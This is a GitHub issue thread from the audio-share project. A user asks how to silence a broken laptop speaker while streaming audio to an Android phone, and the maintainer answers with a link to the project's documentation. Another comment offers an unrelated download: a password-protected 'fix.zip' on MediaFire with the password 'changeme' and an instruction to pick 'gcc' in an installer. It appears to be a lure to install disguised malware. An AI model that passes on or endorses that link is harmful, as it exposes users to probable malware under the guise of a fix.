### ISSUE TITLE
My speaker is Broken but audio is being share simultaniously while speaker is buzzing?

### ISSUE THREAD

**Issue by uuc110** [mkckr0/audio-share#81]
**Describe the bug**
As the title says, My laptop speaker is broken hence it sounds so buzzy. so I used this audio share and the audio is ringing on both devices. if I mute Laptop then android gets too. how can I fix that

**Expected behaviour**
The laptop should get muted and only voice should come from the android

**Server (please complete the following information):**
 - OS: Windows 11 Pro 23H2
 - GUI or CMD: GUI
 - Version: v0.1.0

**Android (please complete the following information):**
 - Device: Samsung Galaxy note 8
 - OS: Android P
 - Version 0.1.0

**Comment by ChangjingZhang** [comment]
Download 
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by mkckr0** [comment]
https://github.com/mkckr0/audio-share#method-2-install-a-third-party-virtual-audio-device-driver
